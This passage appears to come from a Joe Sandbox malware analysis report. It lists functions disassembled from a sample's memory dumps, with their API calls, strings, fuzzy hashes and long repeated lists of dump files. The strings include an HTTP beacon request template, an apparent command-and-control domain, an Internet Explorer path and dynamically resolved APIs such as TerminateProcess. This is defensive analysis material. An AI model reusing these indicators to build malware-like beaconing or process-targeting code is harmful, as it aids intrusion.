Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: ExitSleepThread
String ID: <6@$GET %s HTTP/1.1Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*Accept-Language: zh-cnAccept-Encoding: gzip, deflateUser-Agent:Mo
API String ID: 2532117645-2365876256
Opcode ID: c3d47d769dcbd41a8f4167cd28f1adef2b6d86539016551bb7ef57a848531342
Instruction ID: e6dcf0b5b1e536148edb8c7bcee7a6828d1d94e54290116fa950f8d1a6053691
Opcode Fuzzy Hash: c3d47d769dcbd41a8f4167cd28f1adef2b6d86539016551bb7ef57a848531342
Instruction Fuzzy Hash: 0E21A572144344AFD324DB24DD45FEB73A8EF85315F00493DF685A2281EF7565098BAB

Function 0047DD81 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

__common_dcos_data.LIBCMT ref: 0047DDB4
GetModuleHandleA.KERNEL32(0019FF10), ref: 0047DDF0
GetProcAddress.KERNEL32(00000000,0047DE89), ref: 0047DDFB

Strings

.DLL, xrefs: 0047DDE6

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: AddressHandleModuleProc__common_dcos_data
String ID: .DLL
API String ID: 2806178913-899428287
Opcode ID: 0fa01848d210b57bb453f32dbcffa362a82695b600437f2d08515dbb2483781a
Instruction ID: c5ec6d486fce7f0b5af40ab92ba6bfa2d864c272dae36f1ef15e8a9f11e87408
Opcode Fuzzy Hash: 0fa01848d210b57bb453f32dbcffa362a82695b600437f2d08515dbb2483781a
Instruction Fuzzy Hash: 8301DF31920404ABCF75CE3CC549AEB3B79DF19341F108416F41D8E955C6B8CE41CBAA

Function 00401820 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 50libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,ProcessTrans), ref: 0040182F

Strings

<6@, xrefs: 00401896
%u.%u.%u.%u, xrefs: 00401890
ProcessTrans, xrefs: 00401829

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: AddressProc
String ID: %u.%u.%u.%u$<6@$ProcessTrans
API String ID: 190572456-2997530932
Opcode ID: 923ab22f828fa07c49138cca62a50a6aac9a6e92c9ae45124c644abfdc677477
Instruction ID: 3a4176f581b1380518edbe1a1b49e1bd09d6b00a217a4bcfab538be4d270b979
Opcode Fuzzy Hash: 923ab22f828fa07c49138cca62a50a6aac9a6e92c9ae45124c644abfdc677477
Instruction Fuzzy Hash: E901A172414302AFD314DB24CD85E7B77A8EFC4704F048A3CF895A62D0DB78D9088B9A

Function 00403C10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18stringCOMMON

Download Yara Rule

APIs

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00403C20
lstrcatA.KERNEL32(?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C35
lstrcpyA.KERNEL32(?,?,?,\Program Files\Internet Explorer\iexplore.exe,?,00000104), ref: 00403C48

Strings

\Program Files\Internet Explorer\iexplore.exe, xrefs: 00403C2A

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: DirectorySystemlstrcatlstrcpy
String ID: \Program Files\Internet Explorer\iexplore.exe
API String ID: 2630975639-1907246925
Opcode ID: 9d610355a3853537af27de88a3b84bfec3623b09a142c4852019a6b4888a0da7
Instruction ID: 58d9aff6231955fab03da148272387ac6a18f6e7ddf61f3ccb84cd9a8b5690bb
Opcode Fuzzy Hash: 9d610355a3853537af27de88a3b84bfec3623b09a142c4852019a6b4888a0da7
Instruction Fuzzy Hash: 4FE086F4548340ABD710D754D948FAA77A4BB94305F45882CB5CDD2190D6B8809CC71A

Function 004044FC Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,TerminateProcess), ref: 0040451A
GetProcAddress.KERNEL32(00000000), ref: 00404521

Strings

TerminateProcess, xrefs: 00404510
kernel32.dll, xrefs: 00404515

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: TerminateProcess$kernel32.dll
API String ID: 2574300362-189552057
Opcode ID: 6f636aeb74e389af04e2a293c086324e8f42b9283dc5f0b57c6f061e2f8a9beb
Instruction ID: 033c7f9598048c8c3c56f6b884b3fb58df83f6f11900fedc1394fc5852d01883
Opcode Fuzzy Hash: 6f636aeb74e389af04e2a293c086324e8f42b9283dc5f0b57c6f061e2f8a9beb
Instruction Fuzzy Hash: 78C012B2681300AAC2806BA0BE08A643710A285A2A320103BF602B00E0CA3A00208B2D

Function 004012D0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 8libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,SizeofResource), ref: 004012EA
GetProcAddress.KERNEL32(00000000), ref: 004012F1

Strings

SizeofResource, xrefs: 004012E0
kernel32.dll, xrefs: 004012E5

Memory Dump Source

Source File: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042357404.0000000000445000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042391202.000000000044A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042425715.000000000044C000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042459631.0000000000452000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042494427.0000000000453000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042529261.0000000000458000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042564892.000000000045A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042599424.000000000045B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042632509.0000000000460000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042665134.0000000000461000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042698465.0000000000466000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042729811.0000000000468000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042768818.0000000000469000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042801538.000000000046E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042833900.000000000046F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042866159.0000000000474000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042900352.0000000000476000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042933732.0000000000477000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_hrl97AF.jbxd

Similarity

API ID: AddressLibraryLoadProc
String ID: SizeofResource$kernel32.dll
API String ID: 2574300362-1445693867
Opcode ID: 971289207801f0adfb33d8d7a52fdaf637566f62aa59e6dc078033588d0b97f7
Instruction ID: 1f67b7e38132fca7fb6d3c7304225dc3284bb93b5259144f6b05d2bd588ba888
Opcode Fuzzy Hash: 971289207801f0adfb33d8d7a52fdaf637566f62aa59e6dc078033588d0b97f7
Instruction Fuzzy Hash: B4C09B705C1300DBC7406BF07F0DA0537556645F41311007EB843F11F0CEB910115B1D

Function 0048026D Relevance: 6.1, APIs: 4, Instructions: 84sleepstringCOMMON

Download Yara Rule

APIs

Sleep.KERNEL32(00001388,00000000,00000000), ref: 004800FB
lstrlenA.KERNEL32(ilo.brenz.pl), ref: 00480125
GetVersionExA.KERNEL32(?,?,0047FBBE,00000010), ref: 004801BF
Sleep.KERNEL32(00000064,?,?,00482C2E,00482E2D,00000000,?,00482C2E,00000000,?,?,00000000), ref: 0048031A
GetTickCount.KERNEL32 ref: 00480323
Sleep.KERNEL32(00007530), ref: 0048035B

Memory Dump Source

Source File: 00000007.00000002.2042970923.000000000047C000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2041535304.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041574826.0000000000401000.00000020.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041611547.0000000000406000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041707592.0000000000408000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041744590.000000000040A000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041780728.0000000000411000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041817144.0000000000414000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041856155.000000000041A000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041889922.000000000041B000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041925085.0000000000420000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041960628.0000000000422000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2041998511.0000000000428000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042034583.0000000000429000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042070942.000000000042E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042109164.0000000000430000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042142445.0000000000436000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042178619.0000000000437000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042214148.000000000043C000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042250391.000000000043E000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042287121.000000000043F000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000007.00000002.2042322483.0000000000444000.00000040.00000001.01000000.00000005.sdmpDownload File
